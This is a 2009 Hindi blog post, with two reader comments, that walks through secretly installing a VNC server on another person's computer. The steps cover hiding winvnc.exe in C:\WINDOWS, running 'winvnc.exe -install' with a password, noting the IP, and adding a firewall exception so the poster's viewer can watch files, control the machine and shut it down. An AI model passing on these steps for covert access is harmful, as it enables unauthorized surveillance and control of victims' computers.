Pages

Wednesday, December 2, 2009

कंट्रोल करें कोई भी कंप्यूटर को अपने कंप्यूटर से (kisi ke system ko hack kerna)

कंट्रोल करें कोई भी कंप्यूटर को अपने कंप्यूटर से यह बहुत ही आसान है तो अब मैं
बताता हूँ इश्से आप कोई भी कंप्यूटर हो आप घर में बैठे बैठे अपने कंप्यूटर से
कंट्रोल कर सकते है और उष कंप्यूटर के फ़ाइल को ओपन और movies भी प्ले करें यानी
कि आप उश्के कंप्यूटर को फुल कंट्रोल के साथ shutdown भी कर सकते हैं इश्मे आप
फ़ाइल भी एक्सेस कर सकते हैं पर मैं एक बात बताना चाहता हूँ कि आप इश्का गलत
इस्तेमाल ना करें और कोई फ़ाइल डिलीट नही करें कोई भी नुकशान ना पहुचाएँ सबसे पहले
तो आपको यह फ़ाइल लोड करना है फ़ाइल लोड करने के लिये यहाँ क्लिक
करें

यह फ़ाइल केवल 195kb का है लोड करने के बाद आप
इशको एक्सट्रेकट कर दें


अब उशे कॉपी करें और जिश्का भी पीसी हैक
यानी कंट्रोल करना हो उश्के कंप्यूटर में
"C:/" drive में दाल दें या अगर और छिपाना चाहतें हैं तो
"C:\WINDOWS" में पेस्ट कर दें अब स्टार्ट मेनू के रन पर जाएँ और टाइप करें "cmd"
या "command prompt" ओपन करें और टाइप "cd .." एंटर दबाएँ अब फिर से टाइप करें "cd
.." एंटर दबाएँ और अब टाइप करें "winvnc.exe -install" एंटर दबाएँ एक छोटा सा
window आयेगा उश्मे पासवर्ड डाल दें धयान रहे कि जो आप पासवर्ड डाल रहें है woh बाद



मी आपको अपने कंप्यूटर के vnc viewer में डालना है ओके कर दें अब आपको उष कंप्यूटर
का ip address कि जरुरत पड़ेगी कमांड प्रोम्पट में ही टाइप करें "ipconfig" और आईपी
लिखा आजाएगा उशे लिख लें शिर्फ़ ip address जो रहेगा लिख के रख लें
अब कंट्रोल पैनल में जा के "विन्डोज़ फायरवाल"
को ओपन करें और exceptions पर क्लिक करें अब एड़ प्रोग्राम पर दबाएँ और ब्राउस करें
आपने vnc को पेस्ट किया था c:/ में उशे ओपन करें शिर्फ़ vnc.exe को ही ओपन करें
अब ओके दबाएँ


अब आप अपने कंप्यूटर पर आयें और vnc viewer डाउन्लोड करें
vnc viewer डाउन्लोड करने के लिये गूगल में सर्च करें यह टाइप करें "vnc download"
गूगल का पहला जो सर्च रिजल्ट आयेगा उश्पर क्लिक करें हेल्प के लिये दिया हुआ



स्क्रीन शोट देखें फ्री एडिशन वाला डाउन्लोड करें


अब बिना फॉर्म भरे प्रोसीड
टू डाउन्लोड पर क्लिक करें अब विन्डोज़ वाला डाउन्लोड करें यह 206kb का फ़ाइल है अब
जब डाउन्लोड हो जाये तो उशे ओपन और सर्वर यानी आईपी एड्रेस टाइप करें जिश्के
कंप्यूटर मे आपने vnc.exe डाला था आईपी एड्रेस उशी का होना चाहीये अब पासवर्ड डाल
दें जो आपने उष पीसी मे डाला था और आब मस्ती करें क्यों कि अब आपका उष पीसी पर
कंट्रोल है और आप उष पीसी पर क्या हो रह है आपको पता चलता रहेगा और आप कभी भी उष
पीसी को shutdown कर शकते हैं पूरा कंट्रोल करें

2 comments:

Unknown said...

duniya ko hacking nhi ethikal hacking ke baare me bataayen..

SoNu said...

pahla link to show hi nahi kar raha hai